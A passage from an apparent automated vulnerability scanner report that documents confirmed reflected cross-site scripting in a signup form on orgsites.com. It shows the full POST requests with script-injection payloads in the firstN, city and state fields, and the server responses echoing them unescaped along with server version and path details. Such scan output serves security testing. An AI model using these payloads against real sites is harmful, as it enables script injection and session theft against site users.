VALUE="not_used"><INPUT TYPE="hidden" NAME="subs" VALUE="Y"><INPUT TYPE="hidden" NAME="DirFLAG" VALUE="Y"></td></tr></table></TD></TR></TABLE></TD></TR></TABLE></FORM></body></html>
- /002_Directory.php3

/002_Directory.php3 CONFIRMED

http://www.orgsites.com/002_Directory.php3

Parameters

Parameter Type Value
firstN POST '"--></style></script><script>alert(0x0029A3)</script>
lastN POST 3
email POST netsparker@example.com
user POST 3
passwrd1 POST 3
passwrd2 POST 3
MAINurl POST 3
title POST 3
street POST 3
city POST 3
state POST 3
zip POST 3
phone POST 3
body POST 3
keyw POST 3
ccatg POST Animals
dir_name POST Smith
submit POST DONE ...Give me my Directory Listing!
country POST USA
valp POST not_used
subs POST Y
DirFLAG POST Y

Request

POST /002_Directory.php3 HTTP/1.1
Referer: http://www.orgsites.com/002_Directory.php3
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.orgsites.com
Cookie: idV[33741]=862673926; idV[49035]=198432167; idV[54622]=321812240; idV[52895]=1067304613; idV[48945]=693846868; idV[47313]=175002378; idV[1911]=282431166; idV[50350]=1848186732; idV[50023]=1244575100; idV[28256]=634765200; idV[50522]=1188109459; idV[34463]=897324517; idV[34546]=263065073; idV[34964]=1177416072; idV[35310]=1277277378; idV[40329]=1594343500; idV[43800]=1032077503; idV[38440]=233593925; idV[44345]=2105004117; idV[47371]=301324675
Content-Length: 352
Accept-Encoding: gzip, deflate

firstN=%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x0029A3)%3C%2Fscript%3E&lastN=3&email=netsparker%40example.com&user=3&passwrd1=3&passwrd2=3&MAINurl=3&title=3&street=3&city=3&state=3&zip=3&phone=3&body=3&keyw=3&ccatg=Animals&dir_name=Smith&submit=DONE+...Give+me+my+Directory+Listing!&country=USA&valp=not_used&subs=Y&DirFLAG=Y

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 17:54:17 GMT
Server: Apache/1.3.26 (Unix) AuthMySQL/2.20 PHP/4.1.2 mod_gzip/1.3.19.1a mod_ssl/2.8.9 OpenSSL/0.9.6g
X-Powered-By: PHP/4.1.2
Transfer-Encoding: chunked
Content-Type: text/html


<br><b>Warning</b>: OpenDir: No such file or directory (errno 2) in <b>/home/glnorg/cgi-bin/join_functions_News.php3</b> on line <b>1102</b><br><br><b>Warning</b>: Supplied argument is not a valid Directory resource in <b>/home/glnorg/cgi-bin/join_functions_News.php3</b> on line <b>1103</b><br><br><b>Warning</b>: Supplied argument is not a valid Directory resource in <b>/home/glnorg/cgi-bin/join_functions_News.php3</b> on line <b>1111</b><br><html><head><SCRIPT LANGUAGE=JavaScript><!-- Beginvar submitcount=0;function checkFields() { if (submitcount == 0) { submitcount++; return true; } else { alert("Please be patient ... we are processing your request now"); return false; }}// End --></script><script language=javascript><!--function OpenWindowT(url, name){ popupWin = window.open(url, name, 'scrollbars,width=300,height=400,left=20,top=20')}// --></script><title>OrgSites Directory Listing Signup</title></head><body bgcolor=cccc99 text=666633 link=537492 vlink=000000><form action="002_Directory.php3" method="post" onSubmit="return checkFields()"><center><table width=450 cellpadding=5 cellspacing=0 border=1><tr bgcolor=ffffcc><td><FONT FACE="Verdana, Arial, Helvetica" size=2><table width=100%><tr><td align=left valign=bottom><font FACE="Verdana, Arial, Helvetica" size=4><b><font color=red>Oops! ...<br>Please check the following (red) entries*</font></b></font></td></tr><tr><td width=100% align=center valign=top bgcolor=666633><img src=images/s.gif height=3 width=3><br></td></tr></table><table width=100% cellspacing=0 cellpadding=6 border=0 BGCOLOR=ffffcc><TR><td align=left valign=top colspan=2 width=100%><FONT COLOR=black FACE="arial,helvetica" size=2></td></tr><tr><td align=left valign=top width=50%><P><font FACE="arial,helvetica" color=#002F1C size=2><table width=60% cellpadding=3 cellspacing=0 border=0><tr><td colspan=2 align=left valign=top><font FACE="arial,helvetica" color=#002F1C size=2><P></td></tr><tr><td align=right valign=top><font FACE="arial,helvetica" color=#002F1C size=2><img src=images/s.gif height=1 width=200><br clear=all>First Name</td><td align=left valign=top><input type="text" name="firstN" size=15 value=\0\'\"--></style></script><script>netsparker(0x0029A3)</script>></td></tr><tr><td align=right valign=top><font FACE="arial,helvetica" color=#002F1C size=2>Last Name</td><td align=left valign=top><input type="text" name="lastN" size=15 value=3></td></tr><tr><td align=right valign=top><font FACE="arial,helvetica" color=#002F1C size=2>Email Address</td><td align=left valign=top><input type="text" name="email" size=25 value=netsparker@example.com></td></tr><tr><td align=right valign=top><font FACE="arial,helvetica" color=#002F1C size=2><font color=red><b>*USER ID !!</b></font></td><td align=left valign=top><input type="text" name="user" size=15 value=3><br><font color=blue size=2>*The USER ID NAME &quot;<font color=red><b>3</b></font>&quot; is already in use! Try adding a number or two... (before and/or after &quot;<font color=red><b>3</b></font>&quot;)...Or try using the first part of your email address (before the @ symbol)</font></td></tr><tr><td align=right valign=middle><font FACE="arial,helvetica" color=#002F1C size=2>Please choose a password</td><td align=left valign=middle><input type="password" name="passwrd1" size=15 value=3></td></tr><tr><td align=right valign=middle><font FACE="arial,helvetica" color=#002F1C size=2>Type password again to verify</td><td align=left valign=middle><input type="password" name="passwrd2" size=15 value=3></td></tr></table></td></tr><tr><td valign=top width=50%><font face="arial,helvetica" color=black size=2><table cellpadding=5 cellspacing=0 border=0><tr><td colspan=2 align=left valign=bottom><font FACE="arial,helvetica" color=#002F1C size=2><HR><font color=blue><I><b>Enter the full URL (web site address) for the site<br>you want to list inOrgSites' Directory.</b></font></i><p><font color=blue><i>Website address of site you want<br>to list in OrgSites' Directory</i> <font size=1>(full URL <font color=red>including &quot;http://&quot;</font>)</font></font> <br><input type=text name=MAINurl size=40 value=3><HR><p><P>Name or title of your organization<br><font size=1>(This name or title will appear in the OrgSites' Directory, but you can change it later.)</font><br><input type="text" name="title" size=40 value="3"><BR>Organization's street address<br><input type="text" name="street" size=40 value="3"></td></tr><tr><td align=left valign=top><font FACE="arial,helvetica" color=#002F1C size=2>city<br><input type="text" name="city" size=15 value=3><br>state<br><SELECT NAME="state"><option value=3>3<OPTION VALUE="AL">Alabama<OPTION VALUE="AK">Alaska<OPTION VALUE="AZ">Arizona<OPTION VALUE="AR">Arkansas<OPTION VALUE="CA">California<OPTION VALUE="CO">Colorado<OPTION VALUE="CT">Connecticut<OPTION VALUE="DE">Delaware<OPTION VALUE="DC">D.C.<OPTION VALUE="FL">Florida<OPTION VALUE="GA">Georgia<OPTION VALUE="HI">Hawaii<OPTION VALUE="ID">Idaho<OPTION VALUE="IL">Illinois<OPTION VALUE="IN">Indiana<OPTION VALUE="IA">Iowa<OPTION VALUE="KS">Kansas<OPTION VALUE="KY">Kentucky<OPTION VALUE="LA">Louisiana<OPTION VALUE="ME">Maine<OPTION VALUE="MD">Maryland<OPTION VALUE="MA">Massachusetts<OPTION VALUE="MI">Michigan<OPTION VALUE="MN">Minnesota<OPTION VALUE="MS">Mississippi<OPTION VALUE="MO">Missouri<OPTION VALUE="MT">Montana<OPTION VALUE="NE">Nebraska<OPTION VALUE="NV">Nevada<OPTION VALUE="NH">New Hampshire<OPTION VALUE="NJ">New Jersey<OPTION VALUE="NM">New Mexico<OPTION VALUE="NY">New York<OPTION VALUE="NC">North Carolina<OPTION VALUE="ND">North Dakota<OPTION VALUE="OH">Ohio<OPTION VALUE="OK">Oklahoma<OPTION VALUE="OR">Oregon<OPTION VALUE="PA">Pennsylvania<OPTION VALUE="RI">Rhode Island<OPTION VALUE="SC">South Carolina<OPTION VALUE="SD">South Dakota<OPTION VALUE="TN">Tennessee<OPTION VALUE="TX">Texas<OPTION VALUE="UT">Utah<OPTION VALUE="VT">Vermont<OPTION VALUE="VA">Virginia<OPTION VALUE="WA">Washington<OPTION VALUE="DC">Washington D.C.<OPTION VALUE="WV">West Virginia<OPTION VALUE="WI">Wisconsin<OPTION VALUE="WY">Wyoming</SELECT><BR>Postal Code (ZIP)<br><input type="text" name="zip" size=15 value=3><br></td><td align=left valign=top><font FACE="arial,helvetica" color=#002F1C size=2>phone# (555-555-5555)<br><input type="text" name="phone" size=15 value="3"><br></td></tr><tr><td colspan=2 align=left valign=top><font FACE="arial,helvetica" color=002F1C size=2><HR></td></tr><tr bgcolor=ffffcc><td colspan=2 align=left valign=top><FONT FACE="Verdana, Arial, Helvetica" size=2><table width=100%><tr><td align=left valign=bottom><font FACE="Verdana, Arial, Helvetica" size=4><b>Describe your organization and<br>choose your Directory Listing address</b></font></td></tr><tr><td width=100% align=center valign=top bgcolor=666633><img src=images/s.gif height=3 width=3><br></td></tr></table><table width=100% cellspacing=0 cellpadding=6 border=0 BGCOLOR=ffffcc><tr><td width=50%><p><font FACE="arial,helvetica" color=002F1C size=2><p>Short description of your organization<br><font size=1>(This description will appear in OrgSites' Directory)</font><br><textarea name=body cols=40 rows=5 wrap=virtual>3</textarea><p>Unique key words / phrases separated by commas:<br><font size=1>(Approx 10 words used for OrgSites' Directory Searches)</font><br><textarea name=keyw cols=40 rows=2 wrap=virtual>3</textarea><p>Please select your organization's type/category. (Your organization will be categorized in the OrgSites Directory so viewers can find you by type or category.)<div align=center><p><select name="ccatg"><option value=Animals>Animals<OPTION VALUE=Animals>Animals<OPTION VALUE=Arts_Culture>Arts-Culture<OPTION VALUE=Business>Business<OPTION VALUE=Computers>Computers<OPTION VALUE=Disaster>Disaster<OPTION VALUE=Education>Education<OPTION VALUE=Environment>Environment<OPTION VALUE=Ethnic>Ethnic<OPTION VALUE=Fraternal>Fraternal<OPTION VALUE=Gov-Politics>Gov-Politics<OPTION VALUE=Health>Health<OPTION VALUE=Hobbies>Hobbies<OPTION VALUE=Religion>Religion<OPTION VALUE=Service>Service<OPTION VALUE=Social>Social<OPTION VALUE=Sports>Sports<OPTION VALUE=Youth>Youth<OPTION VALUE=Unique>Unique</select></div><p><P>PICK YOUR INTERNET ADDRESS (Suffix):<P>When you enter your site into OrgSites' Directory, you will receive a NewsBar with all of its features inactive. You will have an internet address for this NewsBar, and you may activate its features at any time. Because OrgSites hosts your inactive NewsBar for free, your internet address must begin with <b>www.orgsites.com</b>. Following this comes your state abbreviation (which is automatically supplied from the information you give above) and then the name you choose for your organization. The full internet address for your inactive NewsBar will look like this:<p align=center><b>www.orgsites.com/state/<font size=3 color=blue>name-you-choose</b></font><p>The only part of your URL that you will need to choose is the word or continuous character string for the NAME-YOU-CHOOSE (Suffix) portion of your address. Use a short, descriptive name that is easily associated with your group.<p>The name must be a continuous string of letters, with no spaces, all lower case. DO NOT USE SPACES OR SPECIAL CHARACTERS <B>(&#064; . &#035; &#036; &#037; &#094; &amp; | / + ' &quot; ? ~ &lt; &gt;)</B>. A hyphen (-) is OK to separate words. <font color=red>Do not supply your state abbreviation. That is supplied automatically. Supply only the very last part (<b>Suffix</b>) of your URL.</font><P><center><font color=blue size=3><b>Suffix&nbsp;</B></font><input type=text name=dir_name size=10 value=smith><p></td></tr><tr><td align=left valign=middle colspan=2><font FACE="arial,helvetica" color=#002F1C size=2></font></td></tr></table><P><P><hr><p><div align=center><input type=submit name=submit value="DONE ...Give me my Directory Listing!"><p><font size=1 color=red>To Cancel This Sign-Up, <a href=javascript:close()>CLICK HERE</a></font></div><INPUT TYPE="hidden" NAME="country" VALUE="USA"><INPUT TYPE="hidden" NAME="valp" VALUE="not_used"><INPUT TYPE="hidden" NAME="subs" VALUE="Y"><INPUT TYPE="hidden" NAME="DirFLAG" VALUE="Y"></td></tr></table></TD></TR></TABLE></TD></TR></TABLE></FORM></body></html>
- /002_Directory.php3

/002_Directory.php3 CONFIRMED

http://www.orgsites.com/002_Directory.php3

Parameters

Parameter Type Value
firstN POST 3
lastN POST 3
email POST netsparker@example.com
user POST 3
passwrd1 POST 3
passwrd2 POST 3
MAINurl POST 3
title POST 3
street POST 3
city POST '"--></style></script><script>alert(0x0029AC)</script>
state POST 3
zip POST 3
phone POST 3
body POST 3
keyw POST 3
ccatg POST Animals
dir_name POST Smith
country POST USA
valp POST not_used
subs POST Y
DirFLAG POST Y

Request

POST /002_Directory.php3 HTTP/1.1
Referer: http://www.orgsites.com/002_Directory.php3
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.orgsites.com
Cookie: idV[33741]=862673926; idV[49035]=198432167; idV[54622]=321812240; idV[52895]=1067304613; idV[48945]=693846868; idV[47313]=175002378; idV[1911]=282431166; idV[50350]=1848186732; idV[50023]=1244575100; idV[28256]=634765200; idV[50522]=1188109459; idV[34463]=897324517; idV[34546]=263065073; idV[34964]=1177416072; idV[35310]=1277277378; idV[40329]=1594343500; idV[43800]=1032077503; idV[38440]=233593925; idV[44345]=2105004117; idV[47371]=301324675
Content-Length: 302
Accept-Encoding: gzip, deflate

firstN=3&lastN=3&email=netsparker%40example.com&user=3&passwrd1=3&passwrd2=3&MAINurl=3&title=3&street=3&city='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0029AC)%3c%2fscript%3e&state=3&zip=3&phone=3&body=3&keyw=3&ccatg=Animals&dir_name=Smith&country=USA&valp=not_used&subs=Y&DirFLAG=Y

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 17:55:04 GMT
Server: Apache/1.3.26 (Unix) AuthMySQL/2.20 PHP/4.1.2 mod_gzip/1.3.19.1a mod_ssl/2.8.9 OpenSSL/0.9.6g
X-Powered-By: PHP/4.1.2
Transfer-Encoding: chunked
Content-Type: text/html


<html><head><SCRIPT LANGUAGE=JavaScript><!-- Beginvar submitcount=0;function checkFields() { if (submitcount == 0) { submitcount++; return true; } else { alert("Please be patient ... we are processing your request now"); return false; }}// End --></script><script language=javascript><!--function OpenWindowT(url, name){ popupWin = window.open(url, name, 'scrollbars,width=300,height=400,left=20,top=20')}// --></script><title>OrgSites Directory Listing Signup</title></head><body bgcolor=cccc99 text=666633 link=537492 vlink=000000><form action="002_Directory.php3" method="post" onSubmit="return checkFields()"><center><table width=450 cellpadding=5 cellspacing=0 border=1><tr bgcolor=ffffcc><td><FONT FACE="Verdana, Arial, Helvetica" size=2><table width=100%><tr><td align=left valign=bottom><font FACE="Verdana, Arial, Helvetica" size=4><b>Get your FREE OrgSites Directory Listing!</b></font></td></tr><tr><td width=100% align=center valign=top bgcolor=666633><img src=images/s.gif height=3 width=3><br></td></tr></table><table width=100% cellspacing=0 cellpadding=6 border=0 BGCOLOR=ffffcc><TR><td align=left valign=top colspan=2 width=100%><FONT COLOR=black FACE="arial,helvetica" size=2></td></tr><tr><td align=left valign=top width=50%><P><font FACE="arial,helvetica" color=#002F1C size=2><table width=60% cellpadding=3 cellspacing=0 border=0><tr><td colspan=2 align=left valign=top><font FACE="arial,helvetica" color=#002F1C size=2><font color=red size=1>First, please read <a href="javascript:OpenWindowT('terms.html', '')"><b>ORGSITES' TERMS OF USE</b>.</a> If you disagree with any term of use, you should not use this site. [click <a href=javascript:close()>HERE</a> if you do not agree with the Terms of Use]</font><hr><p><font color=black><font size=1><i>ALL FIELDS ARE REQUIRED.<br>Accurate email address is VERY important.</i></font><P></td></tr><tr><td align=right valign=top><font FACE="arial,helvetica" color=#002F1C size=2><img src=images/s.gif height=1 width=200><br clear=all>First Name</td><td align=left valign=top><input type="text" name="firstN" size=15 value=3></td></tr><tr><td align=right valign=top><font FACE="arial,helvetica" color=#002F1C size=2>Last Name</td><td align=left valign=top><input type="text" name="lastN" size=15 value=3></td></tr><tr><td align=right valign=top><font FACE="arial,helvetica" color=#002F1C size=2>Email Address</td><td align=left valign=top><input type="text" name="email" size=25 value=netsparker@example.com></td></tr><tr><td align=right valign=top><font FACE="arial,helvetica" color=#002F1C size=2>Choose your USER ID name</td><td align=left valign=top><input type="text" name="user" size=15 value=3></td></tr><tr><td align=right valign=middle><font FACE="arial,helvetica" color=#002F1C size=2>Please choose a password</td><td align=left valign=middle><input type="password" name="passwrd1" size=15 value=3></td></tr><tr><td align=right valign=middle><font FACE="arial,helvetica" color=#002F1C size=2>Type password again to verify</td><td align=left valign=middle><input type="password" name="passwrd2" size=15 value=3></td></tr></table></td></tr><tr><td valign=top width=50%><font face="arial,helvetica" color=black size=2><table cellpadding=5 cellspacing=0 border=0><tr><td colspan=2 align=left valign=bottom><font FACE="arial,helvetica" color=#002F1C size=2><HR><font color=blue><I><b>Enter the full URL (web site address) for the site<br>you want to list inOrgSites' Directory.</b></font></i><p><font color=blue><i>Website address of site you want<br>to list in OrgSites' Directory</i> <font size=1>(full URL <font color=red>including &quot;http://&quot;</font>)</font></font> <br><input type=text name=MAINurl size=40 value=3><HR><p><P>Name or title of your organization<br><font size=1>(This name or title will appear in the OrgSites' Directory, but you can change it later.)</font><br><input type="text" name="title" size=40 value="3"><BR>Organization's street address<br><input type="text" name="street" size=40 value="3"></td></tr><tr><td align=left valign=top><font FACE="arial,helvetica" color=#002F1C size=2>city<br><input type="text" name="city" size=15 value=\'\"--></style></script><script>netsparker(0x0029AC)</script>><br>state<br><SELECT NAME="state"><option value=3>3<OPTION VALUE="AL">Alabama<OPTION VALUE="AK">Alaska<OPTION VALUE="AZ">Arizona<OPTION VALUE="AR">Arkansas<OPTION VALUE="CA">California<OPTION VALUE="CO">Colorado<OPTION VALUE="CT">Connecticut<OPTION VALUE="DE">Delaware<OPTION VALUE="DC">D.C.<OPTION VALUE="FL">Florida<OPTION VALUE="GA">Georgia<OPTION VALUE="HI">Hawaii<OPTION VALUE="ID">Idaho<OPTION VALUE="IL">Illinois<OPTION VALUE="IN">Indiana<OPTION VALUE="IA">Iowa<OPTION VALUE="KS">Kansas<OPTION VALUE="KY">Kentucky<OPTION VALUE="LA">Louisiana<OPTION VALUE="ME">Maine<OPTION VALUE="MD">Maryland<OPTION VALUE="MA">Massachusetts<OPTION VALUE="MI">Michigan<OPTION VALUE="MN">Minnesota<OPTION VALUE="MS">Mississippi<OPTION VALUE="MO">Missouri<OPTION VALUE="MT">Montana<OPTION VALUE="NE">Nebraska<OPTION VALUE="NV">Nevada<OPTION VALUE="NH">New Hampshire<OPTION VALUE="NJ">New Jersey<OPTION VALUE="NM">New Mexico<OPTION VALUE="NY">New York<OPTION VALUE="NC">North Carolina<OPTION VALUE="ND">North Dakota<OPTION VALUE="OH">Ohio<OPTION VALUE="OK">Oklahoma<OPTION VALUE="OR">Oregon<OPTION VALUE="PA">Pennsylvania<OPTION VALUE="RI">Rhode Island<OPTION VALUE="SC">South Carolina<OPTION VALUE="SD">South Dakota<OPTION VALUE="TN">Tennessee<OPTION VALUE="TX">Texas<OPTION VALUE="UT">Utah<OPTION VALUE="VT">Vermont<OPTION VALUE="VA">Virginia<OPTION VALUE="WA">Washington<OPTION VALUE="DC">Washington D.C.<OPTION VALUE="WV">West Virginia<OPTION VALUE="WI">Wisconsin<OPTION VALUE="WY">Wyoming</SELECT><BR>Postal Code (ZIP)<br><input type="text" name="zip" size=15 value=3><br></td><td align=left valign=top><font FACE="arial,helvetica" color=#002F1C size=2>phone# (555-555-5555)<br><input type="text" name="phone" size=15 value="3"><br></td></tr><tr><td colspan=2 align=left valign=top><font FACE="arial,helvetica" color=002F1C size=2><HR></td></tr><tr bgcolor=ffffcc><td colspan=2 align=left valign=top><FONT FACE="Verdana, Arial, Helvetica" size=2><table width=100%><tr><td align=left valign=bottom><font FACE="Verdana, Arial, Helvetica" size=4><b>Describe your organization and<br>choose your Directory Listing address</b></font></td></tr><tr><td width=100% align=center valign=top bgcolor=666633><img src=images/s.gif height=3 width=3><br></td></tr></table><table width=100% cellspacing=0 cellpadding=6 border=0 BGCOLOR=ffffcc><tr><td width=50%><p><font FACE="arial,helvetica" color=002F1C size=2><p>Short description of your organization<br><font size=1>(This description will appear in OrgSites' Directory)</font><br><textarea name=body cols=40 rows=5 wrap=virtual>3</textarea><p>Unique key words / phrases separated by commas:<br><font size=1>(Approx 10 words used for OrgSites' Directory Searches)</font><br><textarea name=keyw cols=40 rows=2 wrap=virtual>3</textarea><p>Please select your organization's type/category. (Your organization will be categorized in the OrgSites Directory so viewers can find you by type or category.)<div align=center><p><select name="ccatg"><option value=Animals>Animals<OPTION VALUE=Animals>Animals<OPTION VALUE=Arts_Culture>Arts-Culture<OPTION VALUE=Business>Business<OPTION VALUE=Computers>Computers<OPTION VALUE=Disaster>Disaster<OPTION VALUE=Education>Education<OPTION VALUE=Environment>Environment<OPTION VALUE=Ethnic>Ethnic<OPTION VALUE=Fraternal>Fraternal<OPTION VALUE=Gov-Politics>Gov-Politics<OPTION VALUE=Health>Health<OPTION VALUE=Hobbies>Hobbies<OPTION VALUE=Religion>Religion<OPTION VALUE=Service>Service<OPTION VALUE=Social>Social<OPTION VALUE=Sports>Sports<OPTION VALUE=Youth>Youth<OPTION VALUE=Unique>Unique</select></div><p><P>PICK YOUR INTERNET ADDRESS (Suffix):<P>When you enter your site into OrgSites' Directory, you will receive a NewsBar with all of its features inactive. You will have an internet address for this NewsBar, and you may activate its features at any time. Because OrgSites hosts your inactive NewsBar for free, your internet address must begin with <b>www.orgsites.com</b>. Following this comes your state abbreviation (which is automatically supplied from the information you give above) and then the name you choose for your organization. The full internet address for your inactive NewsBar will look like this:<p align=center><b>www.orgsites.com/state/<font size=3 color=blue>name-you-choose</b></font><p>The only part of your URL that you will need to choose is the word or continuous character string for the NAME-YOU-CHOOSE (Suffix) portion of your address. Use a short, descriptive name that is easily associated with your group.<p>The name must be a continuous string of letters, with no spaces, all lower case. DO NOT USE SPACES OR SPECIAL CHARACTERS <B>(&#064; . &#035; &#036; &#037; &#094; &amp; | / + ' &quot; ? ~ &lt; &gt;)</B>. A hyphen (-) is OK to separate words. <font color=red>Do not supply your state abbreviation. That is supplied automatically. Supply only the very last part (<b>Suffix</b>) of your URL.</font><P><center><font color=blue size=3><b>Suffix&nbsp;</B></font><input type=text name=dir_name size=10 value=Smith><p></td></tr><tr><td align=left valign=middle colspan=2><font FACE="arial,helvetica" color=#002F1C size=2></font></td></tr></table><P><P><hr><p><div align=center><input type=submit name=submit value="DONE ...Give me my Directory Listing!"><p><font size=1 color=red>To Cancel This Sign-Up, <a href=javascript:close()>CLICK HERE</a></font></div><INPUT TYPE="hidden" NAME="country" VALUE="USA"><INPUT TYPE="hidden" NAME="valp" VALUE="not_used"><INPUT TYPE="hidden" NAME="subs" VALUE="Y"><INPUT TYPE="hidden" NAME="DirFLAG" VALUE="Y"></td></tr></table></TD></TR></TABLE></TD></TR></TABLE></FORM></body></html>
- /002_Directory.php3

/002_Directory.php3 CONFIRMED

http://www.orgsites.com/002_Directory.php3

Parameters

Parameter Type Value
firstN POST 3
lastN POST 3
email POST netsparker@example.com
user POST 3
passwrd1 POST 3
passwrd2 POST 3
MAINurl POST 3
title POST 3
street POST 3
city POST 3
state POST '"--></style></script><script>alert(0x0029B1)</script>
zip POST 3
phone POST 3
body POST 3
keyw POST 3
ccatg POST Animals
dir_name POST Smith
country POST USA
valp POST not_used
subs POST Y
DirFLAG POST Y

Request

POST /002_Directory.php3 HTTP/1.1
Referer: http://www.orgsites.com/002_Directory.php3
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.orgsites.com
Cookie: idV[33741]=862673926; idV[49035]=198432167; idV[54622]=321812240; idV[52895]=1067304613; idV[48945]=693846868; idV[47313]=175002378; idV[1911]=282431166; idV[50350]=1848186732; idV[50023]=1244575100; idV[28256]=634765200; idV[50522]=1188109459; idV[34463]=897324517; idV[34546]=263065073; idV[34964]=1177416072; idV[35310]=1277277378; idV[40329]=1594343500; idV[43800]=1032077503; idV[38440]=233593925; idV[44345]=2105004117; idV[47371]=301324675
Content-Length: 302
Accept-Encoding: gzip, deflate

firstN=3&lastN=3&email=netsparker%40example.com&user=3&passwrd1=3&passwrd2=3&MAINurl=3&title=3&street=3&city=3&state='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0029B1)%3c%2fscript%3e&zip=3&phone=3&body=3&keyw=3&ccatg=Animals&dir_name=Smith&country=USA&valp=not_used&subs=Y&DirFLAG=Y

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 17:55:13 GMT
Server: Apache/1.3.26 (Unix) AuthMySQL/2.20 PHP/4.1.2 mod_gzip/1.3.19.1a mod_ssl/2.8.9 OpenSSL/0.9.6g
X-Powered-By: PHP/4.1.2
Transfer-Encoding: chunked
Content-Type: text/html


<html><head><SCRIPT LANGUAGE=JavaScript><!-- Beginvar submitcount=0;function checkFields() { if (submitcount == 0) { submitcount++; return true; } else { alert("Please be patient ... we are processing your request now"); return false; }}// End --></script><script language=javascript><!--function OpenWindowT(url, name){ popupWin = window.open(url, name, 'scrollbars,width=300,height=400,left=20,top=20')}// --></script><title>OrgSites Directory Listing Signup</title></head><body bgcolor=cccc99 text=666633 link=537492 vlink=000000><form action="002_Directory.php3" method="post" onSubmit="return checkFields()"><center><table width=450 cellpadding=5 cellspacing=0 border=1><tr bgcolor=ffffcc><td><FONT FACE="Verdana, Arial, Helvetica" size=2><table width=100%><tr><td align=left valign=bottom><font FACE="Verdana, Arial, Helvetica" size=4><b>Get your FREE OrgSites Directory Listing!</b></font></td></tr><tr><td width=100% align=center valign=top bgcolor=666633><img src=images/s.gif height=3 width=3><br></td></tr></table><table width=100% cellspacing=0 cellpadding=6 border=0 BGCOLOR=ffffcc><TR><td align=left valign=top colspan=2 width=100%><FONT COLOR=black FACE="arial,helvetica" size=2></td></tr><tr><td align=left valign=top width=50%><P><font FACE="arial,helvetica" color=#002F1C size=2><table width=60% cellpadding=3 cellspacing=0 border=0><tr><td colspan=2 align=left valign=top><font FACE="arial,helvetica" color=#002F1C size=2><font color=red size=1>First, please read <a href="javascript:OpenWindowT('terms.html', '')"><b>ORGSITES' TERMS OF USE</b>.</a> If you disagree with any term of use, you should not use this site. [click <a href=javascript:close()>HERE</a> if you do not agree with the Terms of Use]</font><hr><p><font color=black><font size=1><i>ALL FIELDS ARE REQUIRED.<br>Accurate email address is VERY important.</i></font><P></td></tr><tr><td align=right valign=top><font FACE="arial,helvetica" color=#002F1C size=2><img src=images/s.gif height=1 width=200><br clear=all>First Name</td><td align=left valign=top><input type="text" name="firstN" size=15 value=3></td></tr><tr><td align=right valign=top><font FACE="arial,helvetica" color=#002F1C size=2>Last Name</td><td align=left valign=top><input type="text" name="lastN" size=15 value=3></td></tr><tr><td align=right valign=top><font FACE="arial,helvetica" color=#002F1C size=2>Email Address</td><td align=left valign=top><input type="text" name="email" size=25 value=netsparker@example.com></td></tr><tr><td align=right valign=top><font FACE="arial,helvetica" color=#002F1C size=2>Choose your USER ID name</td><td align=left valign=top><input type="text" name="user" size=15 value=3></td></tr><tr><td align=right valign=middle><font FACE="arial,helvetica" color=#002F1C size=2>Please choose a password</td><td align=left valign=middle><input type="password" name="passwrd1" size=15 value=3></td></tr><tr><td align=right valign=middle><font FACE="arial,helvetica" color=#002F1C size=2>Type password again to verify</td><td align=left valign=middle><input type="password" name="passwrd2" size=15 value=3></td></tr></table></td></tr><tr><td valign=top width=50%><font face="arial,helvetica" color=black size=2><table cellpadding=5 cellspacing=0 border=0><tr><td colspan=2 align=left valign=bottom><font FACE="arial,helvetica" color=#002F1C size=2><HR><font color=blue><I><b>Enter the full URL (web site address) for the site<br>you want to list inOrgSites' Directory.</b></font></i><p><font color=blue><i>Website address of site you want<br>to list in OrgSites' Directory</i> <font size=1>(full URL <font color=red>including &quot;http://&quot;</font>)</font></font> <br><input type=text name=MAINurl size=40 value=3><HR><p><P>Name or title of your organization<br><font size=1>(This name or title will appear in the OrgSites' Directory, but you can change it later.)</font><br><input type="text" name="title" size=40 value="3"><BR>Organization's street address<br><input type="text" name="street" size=40 value="3"></td></tr><tr><td align=left valign=top><font FACE="arial,helvetica" color=#002F1C size=2>city<br><input type="text" name="city" size=15 value=3><br>state<br><SELECT NAME="state"><option value=\'\"--></style></script><script>netsparker(0x0029B1)</script>>\'\"--></style></script><script>netsparker(0x0029B1)</script><OPTION VALUE="AL">Alabama<OPTION VALUE="AK">Alaska<OPTION VALUE="AZ">Arizona<OPTION VALUE="AR">Arkansas<OPTION VALUE="CA">California<OPTION VALUE="CO">Colorado<OPTION VALUE="CT">Connecticut<OPTION VALUE="DE">Delaware<OPTION VALUE="DC">D.C.<OPTION VALUE="FL">Florida<OPTION VALUE="GA">Georgia<OPTION VALUE="HI">Hawaii<OPTION VALUE="ID">Idaho<OPTION VALUE="IL">Illinois<OPTION VALUE="IN">Indiana<OPTION VALUE="IA">Iowa<OPTION VALUE="KS">Kansas<OPTION VALUE="KY">Kentucky<OPTION VALUE="LA">Louisiana<OPTION VALUE="ME">Maine<OPTION VALUE="MD">Maryland<OPTION VALUE="MA">Massachusetts<OPTION VALUE="MI">Michigan<OPTION VALUE="MN">Minnesota<OPTION VALUE="MS">Mississippi<OPTION VALUE="MO">Missouri<OPTION VALUE="MT">Montana<OPTION VALUE="NE">Nebraska<OPTION VALUE="NV">Nevada<OPTION VALUE="NH">New Hampshire<OPTION VALUE="NJ">New Jersey<OPTION VALUE="NM">New Mexico<OPTION VALUE="NY">New York<OPTION VALUE="NC">North Carolina<OPTION VALUE="ND">North Dakota<OPTION VALUE="OH">Ohio<OPTION VALUE="OK">Oklahoma<OPTION VALUE="OR">Oregon<OPTION VALUE="PA">Pennsylvania<OPTION VALUE="RI">Rhode Island<OPTION VALUE="SC">South Carolina<OPTION VALUE="SD">South Dakota<OPTION 